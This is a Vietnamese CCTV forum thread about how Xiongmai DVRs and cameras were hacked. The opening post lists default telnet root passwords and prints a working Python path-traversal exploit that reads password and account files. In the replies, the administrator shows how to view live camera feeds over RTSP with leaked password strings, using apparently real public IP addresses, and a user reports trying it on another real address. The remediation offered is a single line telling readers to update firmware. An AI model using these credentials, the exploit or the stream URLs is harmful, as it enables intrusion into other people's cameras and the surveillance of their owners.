Xiongmai Tech: Bị hack như thế nào và cách khắc phục - Phần 1

Discussion in 'Blog công nghệ' started by Bruce Nguyen, 11/11/17.

  1. Bruce Nguyen

    Bruce Nguyen Administrator Staff Member

    Xin chào anh em trong ngành CCTV! Thời gian vừa qua cũng là cơn bão đầu ghi bị hack nhiều nhất trong lịch sử ngành CCTV thế giới và nặng nề nhất là dòng đầu ghi Xiongmai. Hôm nay mình viết bài viết này để chia sẻ cùng anh em lý do tại sao đầu ghi Xiongmai bị hack, bị hack như thế nào và cách khắc phục. Có thể bài viết có nhiều sai xót mong anh em góp ý.

    1. Xiongmai là gì?
    Đầu ghi, camera Xiongmai là sản phẩm của Hangzhou Xiongmai Technology Co.,Ltd - công ty chuyên về thiết bị giám sát và giải pháp công nghệ. Các bạn có thể nhận biết sản phẩm qua giao diện sử dụng và phần mềm sử dụng như sau:
    - Sử dụng phần mềm di động: vMeye, vMeyeSuper, Xmeye
    - Port TCP: 34567
    - Giao diện qua trình duyệt Web
    [​IMG] [​IMG]

    2. Đầu ghi, Camera IP Xiongmai bị hack như thế nào?
    Theo mình biết sản phẩm của Xiongmai bị 2 lỗi bảo mật nghiêm trọng nên bị các hacker tấn công một cách dễ dàng, bài viết này mình xin chỉ ra 2 phương pháp tấn công hiện đang bị khai thác:
    - Khai thác lỗ hổng bảo mật qua Telnet:
    Lỗ hổng bảo mật thực chất là bị hacker khai thác khi dịch ngược firmware (và Tool resetconfig dành cho IP camera) tìm ra tài khoản quản trị cao nhất của thiết bị được đặt mặc định. Sau đó hacker có thể sử dụng tài khoản này có toàn quyền can thiệp vào toàn bộ chương trình thiết bị như nhà sản xuất. Lỗ hỏng bảo mật này đã được hacker lợi dụng để phát tán virus Mirai để sử dụng làm zoombie cho hệ thống ddos lớn nhất từ trước tới nay. Và hệ quả để lại là: do virus chép đè vào hệ thống chương trình đầu ghi nên đầu ghi sẽ bị 1 trong 2 trình trang sau: Nhẹ thì do virus xung dột và ngốn tài nguyên mạng nên gây mạng chậm, đầu ghi bị reset liên tục khi cắm dây mạng, Nặng thì đầu ghi không thể khởi dộng vì bị chép vào file hệ thống.

    Kịch bản tấn công: Virus Mirai được phát tán bằng cách quét và cài đặt vào tất cả thiết bị nhúng như Modem, Đầu ghi (Xiongmai chỉ là 1 trong những nạn nhân) qua tài khoản quản trị cao cấp nhất của thiết bị được đặt mặc định theo nhà sản xuất. Như ở đây thiết bị của Xiongmai có 2 tài khoản mặc định là:
    - Đầu ghi hình: root/xc3511
    - IP Camera: root/xmhdipc
    Đây chính là tài khoản kết nối qua phương thức telnet (port 23)

    Ví dụ: Thiết bị được reset mật khẩu bằng tài khoản telnet


    - Khai thác lỗ hổng bảo mật qua uc-httpd 1.0.0
    uc-httpd 1.0.0 là một nền tảng HTTP được sử dụng bởi một loạt các thiết bị IoT và dễ bị tổn thương đối với các tập tin nội bộ và các lỗi giao thức thư mục.

    Kịch bản tấn công: Sử dụng lỗ hổng bảo mật để chiếm quyền điều khiển thiết bị, xem password, thông tin lưu trên thiết bị. Ở đây mình dùng 1 đoạn code viết bằng python nhỏ:

    #!/usr/bin/env python
    import urllib2, httplib, sys
    httplib.HTTPConnection._http_vsn = 10
    httplib.HTTPConnection._http_vsm_str = 'HTTP/1.0'
    print "[+] uc-httpd 0day exploiter [+]"
    print "[+] usage: python " + __file__ + " http://<target_ip>"
    host = sys.argv[1]
    fd = raw_input('[+] File or Directory: ')
    print "Exploiting....."
    print '\n'
    print urllib2.urlopen(host + '/../../../../..' + fd).read()


    Đoạn code này giúp ta xem được thông tin file lưu cấu hình, tài khoản thiết bị không cần đăng nhập. Nhờ đó ta có thể xem được file /etc/passwd - File lưu tài khoản telnet cao cấp nhất, /mnt/mtd/Config/Account1 - File lưu toàn bộ tài khoản của thiết bị (admin, user)...

    Ví dụ: Đọc file lưu thông tin tài khoản, cấu trúc thư mục hệ thống trên thiết bị qua khai thác lỗ hổng


    3. Cách khắc phục như thế nào?
    Tất nhiên cách khắc phục ở là cập nhật Firmware mới nhất 2017 của hãng Xiongmai. Chi tiết mình sẽ nghiên cứu sâu hơn và viết trong phần 2. Xin chân thành cám ơn anh chị em đã đọc và quan tâm.

    P/S: Phần 2 xem tại đây
    Xiongmai Tech: Bị hack như thế nào và cách khắc phục - Phần 2
     
    Last edited: 22/11/17
    coolmint80 likes this.
  2. Phũ Phàm Gia

    Phũ Phàm Gia New Member Staff Member

    Ngoài ra có nhiều tình trạng đầu ghi bị mất nguồn nữa bác ơi. Bác làm bài review về nó đi bác.
     
    NguyenQui likes this.
  3. Bruce Nguyen

    Bruce Nguyen Administrator Staff Member

    Cũng đầu ghi Xiongmai này hay đầu ghi hãng nào bác
     
  4. NguyenQui

    NguyenQui New Member

    đúng r của xiongmai đó bác
     
  5. coolmint80

    coolmint80 New Member

    hoi ngu ti passs nay la sao
    "Name" : "abc",
    "Password" : "nTBCS19C",
    "Reserved" : false,
    "Sharable" : true
    lam sao biet no la password gi
     
    Last edited: 28/11/17
    Bruce Nguyen likes this.
  6. Bruce Nguyen

    Bruce Nguyen Administrator Staff Member

    Đó là password đã được mã hóa nhưng vẫn dùng để khai tác được.
    Ví dụ đơn giản nhé! Bạn có đầu ghi http://203.74.156.120:88
    Ví dụ bạn mở port 554 (port mặc định rtsp của 99% đầu ghi) hoặc DMZ đầu ghi
    Thì với url này bạn có thể xem camera (ví dụ: 203.74.156.120) bằng VLC với pass mã hóa XuQSKkpu
    rtsp://203.74.156.120:554/user=admin&password=XuQSKkpu&channel=1&stream=0.sdp

    p/s: lần sau viết bài có dấu nhé bác :D
     
  7. coolmint80

    coolmint80 New Member

    Cảm ơn chủ thớt
     
  8. 7love

    7love New Member

    Mình chạy rtsp://58.187.70.179:554/user=admin&password=ljiKlcjh&channel=1&stream=0.sdp
    nó báo lỗi
    là do vấn đề gì bác nhỉ?
     
  9. Bruce Nguyen

    Bruce Nguyen Administrator Staff Member

    :D vậy là họ ko mở port RTSP 554 rồi
     
  10. 7love

    7love New Member

    Mình thấy đa số là mở port 554. Chắc nhọ. Vào xin password vậy :)
    Cảm ơn bác
     
  11. coolmint80

    coolmint80 New Member

Share This Page